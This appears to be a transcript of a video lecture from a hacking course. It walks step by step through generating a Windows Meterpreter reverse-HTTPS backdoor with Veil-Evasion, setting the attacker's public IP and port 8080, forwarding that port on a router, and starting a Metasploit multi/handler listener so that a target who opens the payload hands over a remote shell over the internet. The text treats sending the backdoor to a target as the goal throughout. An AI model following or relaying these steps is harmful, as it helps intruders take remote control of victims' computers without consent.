Okay, so after learning how we can forward any connection on a certain port to our Linux machine, now we're gonna learn how we can configure our backdoor to run over the internet. So to do that, just now let's start with creating a backdoor. I'm going to use veil of agents, so I'm gonna say cd veil. Here's it. So I'm gonna say use #1 to use veil of agent, and now I'm gonna say list, and I'm gonna select let's say, for example, we want to use this particular payload, so it's number 10. I'm gonna say use 10, and now I'm gonna set the L port. Let's start with the L port. Set L port. Let's say I'm gonna use port 8080, and for the L port you're gonna put your public IP address or the public IP address of the router. So I'm gonna say set L host, and now I'm gonna get the IP address of the router or the public IP address of the router, but unfortunately my or the IP address of my router or the IP version 4 of my router is not enabled from the internet service provider. So I can see it, but I cannot forward any port on it. So let's say can you see me.org. And as you can see, here is my public IP address. I can simply copy it, and then I'm gonna minimize the window, and I'm gonna put it right here. And then I'm gonna say enter, and let's say info or options, and here is the port 8080, and the L host is on my public IP address. So now I'm gonna say generate, enter. And here is our payload is ready to use. I'm gonna copy it and put it on my desktop. So I'm gonna say cp for copy, and I'm gonna put it on my desktop. So here is the backdoor that we are gonna send it to the target. So once the target we open our payload, we are gonna get a reverse connection to our machine. So as I told you before, I don't have the ability to forward any connection on a certain port to my device because I'm using an IP version 6. I'm not using an IP version 4. But in your case, if you have the ability to forward any connection on a certain port, you have the port forwarding feature on your router. You're gonna do as I show you in the previous lecture. You can just go to the setting of the router and create a new rule and redirect the connection on the port. For example, 8080 to your Linux machine. You're gonna put the IP address of your Linux machine, and then you're gonna create the rule, and all the connection that's coming on the port 8080 is gonna be forwarded to your Linux machine. So you're gonna send this backdoor, as I told you before, to your target, and once you open it, you're gonna get the reverse connection. But before we send it to our target, we need to set a listener. So I'm gonna say clear. I'm gonna say msf init to initialize my Metasploit database. msfdb init, and now I'm gonna say msf console to use the interface of Metasploit. So now I'm gonna say use exploit multi-handler to set a listener, and now I'm gonna specify the payload that I have used. So I'm gonna say set payload Windows meter preter. So this is the type of the payload that we have used, reverse HTTPS, and I'm gonna say show options, and I'm gonna set the L port, and as you can see it's 8080, and it's not this port, it's HTTPS. This type of payload that we have used. I'm gonna say show options again, and as you can see the L port is 8443. I'm gonna change it, so I'm gonna say set L port to 8080. So this is the port that we have configured when we were creating our payload, and then I'm gonna say enter, and I'm gonna set the L host. For the L host, I'm gonna put the internal IP address of my Linux. So I'm not gonna put the public IP address of the router. I'm gonna put the internal IP address of my Linux, and we've seen how to check our IP address. Here's it. I'm gonna copy it from here and paste it. Let me say show option again, and you will see that the L host is my internal IP address or the Calanx IP address, and the port is 8080, which is the port that I'm using it in my payload. And then I'm gonna say run. And so now our listener is ready, and once the target open our payload, we're gonna get a reverse connection. But if you have the same issue that I'm facing it right now, you're gonna use the second method that I'm gonna talk about in the next lecture.